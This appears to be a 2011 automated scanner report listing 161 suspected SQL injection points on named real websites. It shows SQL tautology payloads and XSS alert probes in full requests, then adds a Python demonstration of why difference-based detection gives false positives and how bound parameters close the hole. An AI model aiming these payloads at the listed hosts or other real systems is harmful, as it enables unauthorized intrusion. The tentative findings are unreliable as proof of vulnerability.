SQL Injection, DORKS, CWE-89, CAPEC-66, Vulnerable Hosts, Exploits

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Fri Mar 25 13:31:53 CDT 2011.


XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.


1. SQL injection

1.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

1.2. http://cache-www.pronto.com/combine.phpd6bdb [REST URL parameter 1]

1.3. http://cache-www.pronto.com/combine.phpd6bdb [name of an arbitrarily supplied request parameter]

1.4. http://cache-www.pronto.com/combine.phpd6bdb'>9cb9ce2aee9 [name of an arbitrarily supplied request parameter]

1.6. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [REST URL parameter 1]

1.7. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [Referer HTTP header]

1.8. http://cache1.wine.com/favicon.icod1219%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e0ca90fa5de6 [name of an arbitrarily supplied request parameter]

1.9. http://events.oracle.com/search/search [9f0e2%22-alert(document.cookie)-%2216f8f9c9e8e parameter]

1.10. http://events.oracle.com/search/search [name of an arbitrarily supplied request parameter]

1.11. http://googleads.g.doubleclick.net/pagead/ads [flash parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

1.13. http://googleads.g.doubleclick.net/pagead/ads [id cookie]

1.14. http://googleads.g.doubleclick.net/pagead/ads [output parameter]

1.15. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

1.16. http://googleads.g.doubleclick.net/pagead/ads [u_his parameter]

1.17. http://googleads.g.doubleclick.net/pagead/ads [u_java parameter]

1.18. http://jobs.adoperationsonline.com/a/jbb/find-jobs-json/jbb_widget_list_jobpostsd8b3c

1.19. http://login1.vindicosuite.com/vindico_dynamic.asp [password parameter]

1.20. http://login1.vindicosuite.com/vindico_dynamic.asp [username parameter]

1.21. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 1]

1.22. http://nydailynews.stats.com/fb/scoreboard.asp [REST URL parameter 2]

1.23. http://outils.icor.b2f-concept.net/newsletter/inscription_newsletter.php [org_id parameter]

1.24. http://parkcitytrips.com/booking_results.php [cloneID parameter]

1.25. http://parkcitytrips.com/booking_results.php [cloneID parameter]

1.26. http://parkcitytrips.com/booking_results.php [group_id parameter]

1.27. http://parkcitytrips.com/booking_results.php [name of an arbitrarily supplied request parameter]

1.28. http://pixel.yola.com/LoggingAgent/LoggingAgent [Referer HTTP header]

1.29. http://pixel.yola.com/LoggingAgent/LoggingAgent [sitereferer parameter]

1.30. http://thethrottle.com/ [Referer HTTP header]

1.31. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.32. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.33. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [VINDICOAUDIENCEISSUEDIDENTITY cookie]

1.34. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [__qca cookie]

1.35. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.36. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.37. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.38. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.39. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.40. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [name of an arbitrarily supplied request parameter]

1.41. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [redirect parameter]

1.42. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.43. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.44. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.45. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.46. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [vpp cookie]

1.47. http://www.b2f-concept.com/KERNEL/ [ASPSESSIONIDCSABRTBS cookie]

1.48. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

1.49. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

1.50. http://www.b2f-concept.com/KERNEL/ [NODE_ID parameter]

1.51. http://www.b2f-concept.com/KERNEL/ [Referer HTTP header]

1.52. http://www.b2f-concept.com/KERNEL/ [U parameter]

1.53. http://www.b2f-concept.com/KERNEL/ [U parameter]

1.54. http://www.b2f-concept.com/KERNEL/ [VISITEUR cookie]

1.55. http://www.b2f-concept.com/KERNEL/ [__utmb cookie]

1.56. http://www.b2f-concept.com/KERNEL/ [__utmc cookie]

1.57. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [INFORUB parameter]

1.58. http://www.b2f-concept.com/KERNEL/BO/CONTENUS/SET/SetINFORUB.asp [__utmz cookie]

1.59. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]

1.60. http://www.b2f-concept.com/KERNEL/CSS.asp [id parameter]

1.61. http://www.b2f-concept.com/KERNEL/DOC.ASP [id parameter]

1.62. http://www.b2f-concept.com/KERNEL/DOC.asp [id parameter]

1.63. http://www.b2f-concept.com/KERNEL/index.asp [NODE_ID parameter]

1.64. http://www.b2f-concept.com/KERNEL/index.asp [Referer HTTP header]

1.65. http://www.baysideeyes.com.au/ [name of an arbitrarily supplied request parameter]

1.66. http://www.baysideeyes.com.au/favicon.ico [REST URL parameter 1]

1.67. http://www.baysideeyes.com.au/favicon.ico [name of an arbitrarily supplied request parameter]

1.68. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2]

1.69. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 4]

1.70. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5]

1.71. http://www.caribbean-ocean.com/accommodation2.php [id parameter]

1.72. http://www.caribbean-ocean.com/accommodation2.php [name of an arbitrarily supplied request parameter]

1.73. http://www.caribbean-ocean.com/countries2.php [id parameter]

1.74. http://www.caribbean-ocean.com/countries2.php [name of an arbitrarily supplied request parameter]

1.75. http://www.caribbean-ocean.com/enquiry.php [accomm_id parameter]

1.76. http://www.caribbean-ocean.com/enquiry.php [name of an arbitrarily supplied request parameter]

1.77. http://www.caribbean-ocean.com/gallery.php [accomm_id parameter]

1.78. http://www.caribbean-ocean.com/gallery.php [name of an arbitrarily supplied request parameter]

1.79. http://www.caribbean-ocean.com/get-image.php [id parameter]

1.80. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]

1.81. http://www.caribbean-ocean.com/luxury%20Anguilla%20Resort%20holidays/112 [REST URL parameter 2]

1.82. http://www.caribbean-ocean.com/luxury%20Antigua%20and%20Barbuda%20Resort%20holidays/106 [REST URL parameter 2]

1.83. http://www.caribbean-ocean.com/luxury%20Aruba%20Resort%20holidays/307 [REST URL parameter 2]

1.84. http://www.caribbean-ocean.com/luxury%20Bahamas%20Resort%20holidays/116 [REST URL parameter 2]

1.85. http://www.caribbean-ocean.com/luxury%20Barbados%20Resort%20holidays/91 [REST URL parameter 2]

1.86. http://www.caribbean-ocean.com/luxury%20Bermuda%20Resort%20holidays/119 [REST URL parameter 2]

1.87. http://www.caribbean-ocean.com/luxury%20Bonaire%20Island%20holidays/308 [REST URL parameter 2]

1.88. http://www.caribbean-ocean.com/luxury%20British%20Virgin%20Islands%20holidays/108 [REST URL parameter 2]

1.89. http://www.caribbean-ocean.com/luxury%20Cayman%20Islands%20holidays/115 [REST URL parameter 2]

1.90. http://www.caribbean-ocean.com/luxury%20Cuba%20Resort%20holidays/118 [REST URL parameter 2]

1.91. http://www.caribbean-ocean.com/luxury%20Curacao%20holidays/305 [REST URL parameter 2]

1.92. http://www.caribbean-ocean.com/luxury%20Dominica%20holidays/111 [REST URL parameter 2]

1.93. http://www.caribbean-ocean.com/luxury%20Dominican%20Republic%20Resort%20holidays/302 [REST URL parameter 2]

1.94. http://www.caribbean-ocean.com/luxury%20Dutch%20Antilles%20Resort%20holidays/177 [REST URL parameter 2]

1.95. http://www.caribbean-ocean.com/luxury%20Grenada%20Resort%20holidays/107 [REST URL parameter 2]

1.96. http://www.caribbean-ocean.com/luxury%20Guadeloupe%20holidays/303 [REST URL parameter 2]

1.97. http://www.caribbean-ocean.com/luxury%20Haiti%20holidays/301 [REST URL parameter 2]

1.98. http://www.caribbean-ocean.com/luxury%20Jamaica%20Resort%20holidays/105 [REST URL parameter 2]

1.99. http://www.caribbean-ocean.com/luxury%20Maldives%20Hotel%20holidays/12 [REST URL parameter 2]

1.100. http://www.caribbean-ocean.com/luxury%20Martinique%20Hotel%20holidays/304 [REST URL parameter 2]

1.101. http://www.caribbean-ocean.com/luxury%20Montserrat%20Hotel%20holidays/309 [REST URL parameter 2]

1.102. http://www.caribbean-ocean.com/luxury%20Saba%20holidays/312 [REST URL parameter 2]

1.103. http://www.caribbean-ocean.com/luxury%20Saint%20Barthelemy%20holidays/310 [REST URL parameter 2]

1.104. http://www.caribbean-ocean.com/luxury%20Saint%20Eustatius%20holidays/311 [REST URL parameter 2]

1.105. http://www.caribbean-ocean.com/luxury%20Saint%20Lucia%20Hotel%20holidays/99 [REST URL parameter 2]

1.106. http://www.caribbean-ocean.com/luxury%20St%20Barths%20Hotel%20holidays/113 [REST URL parameter 2]

1.107. http://www.caribbean-ocean.com/luxury%20St%20Kitts%20and%20Nevis%20holidays/110 [REST URL parameter 2]

1.108. http://www.caribbean-ocean.com/luxury%20St%20Martin%20Hotel%20holidays/255 [REST URL parameter 2]

1.109. http://www.caribbean-ocean.com/luxury%20St%20Vincent%20and%20the%20Grenadines%20holidays/109 [REST URL parameter 2]

1.110. http://www.caribbean-ocean.com/luxury%20Tobago%20Resort%20holidays/104 [REST URL parameter 2]

1.111. http://www.caribbean-ocean.com/luxury%20US%20Virgin%20Islands%20Resort%20holidays/288 [REST URL parameter 2]

1.112. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [User-Agent HTTP header]

1.113. http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20"-alert("XSS")-"4959465b364 [name of an arbitrarily supplied request parameter]

1.114. http://www.forex-direkt.de/ [b35b2--%3E%3Cscript%3Ealert(document.cookie parameter]

1.115. http://www.gamespy.com/ [Referer HTTP header]

1.116. http://www.hameaualbert.fr/misc/drupal.js1ca13">

1.117. http://www.hameaualbert.fr/misc/drupal.js1ca13">0bfdceb7ad4 [REST URL parameter 2]

1.118. http://www.intranetjournal.com/ [User-Agent HTTP header]

1.119. http://www.masstransitmag.com/online/article.jsp [id parameter]

1.120. https://www.networksolutions.com/manage-it/renewal-center.jsp [7cfda%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83 parameter]

1.121. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 1]

1.122. https://www.networksolutions.com/manage-it/renewal-center.jsp [REST URL parameter 2]

1.123. https://www.networksolutions.com/manage-it/renewal-center.jsp [Referer HTTP header]

1.124. https://www.networksolutions.com/manage-it/renewal-center.jsp [User-Agent HTTP header]

1.125. https://www.networksolutions.com/manage-it/renewal-center.jsp [name of an arbitrarily supplied request parameter]

1.126. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie parameter]

1.127. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [3906b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ee3021d3c780 parameter]

1.128. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [Referer HTTP header]

1.129. http://www.outsourcingdotnetdevelopment.com/xss-cross-site-scripting.html [name of an arbitrarily supplied request parameter]

1.130. http://www.phpbuilder.com/ [Referer HTTP header]

1.131. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

1.132. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

1.133. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]

1.134. http://www.slackbooks.com/essentialknee [REST URL parameter 1]

1.135. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]

1.136. http://www.slackbooks.com/orthopedics [REST URL parameter 1]

1.137. http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ [User-Agent HTTP header]

1.138. http://www.thecounter.com/ [Referer HTTP header]

1.139. http://www.thedailybeast.com/author/lloyd-grove/ [REST URL parameter 2]

1.140. http://www.thedailybeast.com/author/lloyd-grove/'"--> [REST URL parameter 2]

1.142. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]

1.143. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [&CCID parameter]

1.144. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [CLK parameter]

1.145. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [QTR parameter]

1.146. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [Referer HTTP header]

1.147. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]

1.148. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [User-Agent HTTP header]

1.149. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

1.150. http://www.vendorseek.com/dynXHTMLGen/ServiceFormGenerator/css/DefaultStyleSheet.css&vkey=&typage=http:/www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

1.151. http://www.vendorseek.com/no-thankyou.asp&spage=&ff=&fc=&qset=PPC_VS_AB2&segid=&sdw=vendorseek.com&sp=true&LeadSiteURL=http:/www.vendorseek.com/website_design_and_ecommerce.asp [name of an arbitrarily supplied request parameter]

1.152. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 1]

1.153. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 2]

1.154. http://www.virtusa.com/applications/userlogin/userlogin.asp [REST URL parameter 3]

1.155. http://www.wi-fihotspotlist.com/ [User-Agent HTTP header]

1.156. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3ef6545857e09 [REST URL parameter 1]

1.157. http://www.wreg.com/tivid.html [playerID parameter]

1.158. http://www.wwmt.com/articles/calls-1387029-mubarak-friend.html97f15' [User-Agent HTTP header]

1.159. http://www4.jcpenney.com/jcp/XGN.aspx [pcat parameter]

1.160. http://xhtml.co.il/he/page-700/jQuery [REST URL parameter 2]

1.161. http://xhtml.co.il/ru/page-1013/jQuery.browser [REST URL parameter 2]



1. SQL injection
There are 161 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [num parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Issue detail

The num parameter appears to be vulnerable to SQL injection. The payloads 22340464'%20or%201%3d1--%20 and 22340464'%20or%201%3d2--%20 were each submitted in the num parameter, and the two requests produced different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection are unreliable and prone to false positives, which is why this finding is rated Tentative: the check only establishes that two requests received different responses, not that a query was altered. Review the requests and responses below before treating it as confirmed. In this case Response 1 (7344 bytes) serves a Flash creative and Response 2 (935 bytes) serves a GIF creative under a different click-tracking ID, which is what ad-server rotation looks like. Re-sending the identical payload twice and checking whether the responses still differ is the first thing to try; an endpoint that changes its response without the payload changing cannot be assessed by a two-request comparison.

Request 1

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d1--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookie HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7344
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 18 Mar 2011 15:42:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 18 Mar 2011 15:27:05 GMT
Expires: Fri, 18 Mar 2011 15:27:05 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Dec 27 16:38:46 EST 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/578176/GREY-HOSTING-728x90.swf";
var gif = "http://s0.2mdn.net/578176/ns_0003_hosting_728x90.jpg";
var minV = 8;
var FWH = ' width="728" height="90" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ace/7/1d9/%2a/h%3B234419623%3B0-0%3B0%3B50265527%3B3454-728/90%3B40008057/40025844/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d1--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookiehttp://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V102&promo=BCXXX04225");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ace/7/1d9/%2a/h%3B234419623%3B0-0%3B0%3B50265527%3B3454-728/90%3B40008057/40025844/1%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE
...[SNIP]...

Request 2

GET /adi/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d2--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookie HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 935
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 18 Mar 2011 15:42:05 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Cache-Control: no-cache
Pragma: no-cache
Date: Fri, 18 Mar 2011 15:27:05 GMT
Expires: Fri, 18 Mar 2011 15:27:05 GMT
Connection: close

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3ace/4/1d9/%2a/v;234421248;0-0;0;50265527;3454-728/90;40028948/40046735/1;;~sscs=%3fhttp://googleads.g.doubleclick.net/aclk?sa=l&ai=BXHXNHTtyTc3sEcqGlget8L3KBpWpie8BhaKK8hLjqLazM6DUkgIQARgBIL7O5Q04AFDEwrTWBmDJ5vaGyKOgGaABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAVFmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3NxbC1pbmplY3Rpb24teHNzLWZldGNoZG9nY29tLWN3ZTc5LWN3ZTg5Lmh0bWy4AhjAAgXIAuXvxRioAwHRA03G05dUI6-R6AP2BugDswToA_IG9QMAAADE&num=122340464'%20or%201%3d2--%20&sig=AGiWqtxkKZPosMFRS4XthGZnKkwh1QqVnw&client=ca-pub-4063878933780912&adurl=406ba%22-alert(document.cookiehttp://ads.networksolutions.com/landing?code=P111C519S512N0B2A1D691E0000V101"><img src="http://s0.2mdn.net/viewad/578176/728x90_WebsiteTrial.gif" border=0 alt="Advertisement"></a></body></html>
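
The difference-based test described in the issue detail above (a true condition `' or 1=1-- ` and a false condition `' or 1=2-- `, then compare responses) is easy to fool, as the rotating DoubleClick creatives and the per-request pronto.com mid= tokens later in this report show. The following is an added example, not code from XSS.CX or from Burp Suite, that runs the naive two-request comparison next to a version with two controls: strip tokens that legitimately vary between requests, and send the true-condition payload twice to detect a non-deterministic endpoint. The four targets are constructed in-process stand-ins for the hosts in the report: an in-memory SQLite lookup written both with string concatenation (CWE-89) and with a bound parameter, an ad rotator, and a 404 page that stamps a fresh mid= token into its footer link (the token format is modelled on the pronto.com responses; the table, column and creative names are invented).

```python
import itertools
import re
import sqlite3

# ---- constructed stand-in targets (not the hosts in the report) -----------

def make_db():
    """In-memory table standing in for whatever backs a num lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (num INTEGER, creative TEXT)")
    conn.executemany(
        "INSERT INTO ads VALUES (?, ?)",
        [(122340464, "GREY-HOSTING-728x90.swf"),
         (122340465, "728x90_WebsiteTrial.gif")],
    )
    return conn

def vulnerable_lookup(conn, num):
    """CWE-89: the request value is spliced into the SQL text."""
    sql = "SELECT creative FROM ads WHERE num = '%s'" % num
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "<html>db error: %s</html>" % exc
    return "<html>%s</html>" % ",".join(r[0] for r in rows)

def safe_lookup(conn, num):
    """Same query with a bound parameter: the value cannot change the SQL."""
    rows = conn.execute("SELECT creative FROM ads WHERE num = ?", (num,)).fetchall()
    return "<html>%s</html>" % ",".join(r[0] for r in rows)

def make_rotating_ad():
    """Ad server that alternates creatives on every request, payload or not."""
    creatives = itertools.cycle(["GREY-HOSTING-728x90.swf", "728x90_WebsiteTrial.gif"])
    return lambda num: "<html>%s</html>" % next(creatives)

def make_rotating_404():
    """404 page whose footer link carries a fresh per-request mid= token."""
    counter = itertools.count(0x6529688A)
    def fetch(path):
        mid = "%x-12ec97d373c-5fb0" % next(counter)
        return ('<html><h1>404 Not Found</h1><a href="http://www.prontostyle.com/'
                '?mid=%s">ProntoStyle.com</a></html>' % mid)
    return fetch

# ---- detection -----------------------------------------------------------

TRUE_PAYLOAD = "' or 1=1-- "
FALSE_PAYLOAD = "' or 1=2-- "

# Tokens that legitimately change between requests; stripped before comparing.
VOLATILE = [
    re.compile(r"mid=[0-9a-fA-F-]+"),        # per-request ids
    re.compile(r"\b\d{2}:\d{2}:\d{2}\b"),    # clock times
]

def normalize(body):
    for pat in VOLATILE:
        body = pat.sub("", body)
    return body

def naive_check(fetch, value):
    """Two requests, raw comparison: what a difference-based scanner does."""
    return fetch(value + TRUE_PAYLOAD) != fetch(value + FALSE_PAYLOAD)

def robust_check(fetch, value):
    """Same idea with two controls: volatile tokens are stripped, and the
    true-condition payload is sent twice to catch a non-deterministic endpoint."""
    t1 = normalize(fetch(value + TRUE_PAYLOAD))
    t2 = normalize(fetch(value + TRUE_PAYLOAD))
    f = normalize(fetch(value + FALSE_PAYLOAD))
    if t1 != t2:
        return "unstable"            # response changed without the payload changing
    if t1 == f:
        return "not injectable"      # true and false conditions indistinguishable
    return "likely injectable"       # stable endpoint, the condition flips the response

def run_all(value="122340464"):
    """Run both checks against every target; returns {name: (naive, verdict)}."""
    conn = make_db()
    targets = {
        "vulnerable": lambda v: vulnerable_lookup(conn, v),
        "parameterized": lambda v: safe_lookup(conn, v),
        "rotating_ad": make_rotating_ad(),
        "rotating_404": make_rotating_404(),
    }
    return {name: (naive_check(fetch, value), robust_check(fetch, value))
            for name, fetch in targets.items()}

if __name__ == "__main__":
    for name, (naive, verdict) in run_all().items():
        print("%-14s naive-differs=%-5s verdict=%s" % (name, naive, verdict))
```

The naive comparison flags three of the four targets; only the concatenated query is actually injectable. The rotating ad fails the repeat-request control, and the 404 page looks identical once its per-request token is stripped. The bound-parameter version shows why parameterization closes the issue: the same payload reaches the database as an opaque string and matches nothing.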

1.2. http://cache-www.pronto.com/combine.phpd6bdb [REST URL parameter 1]

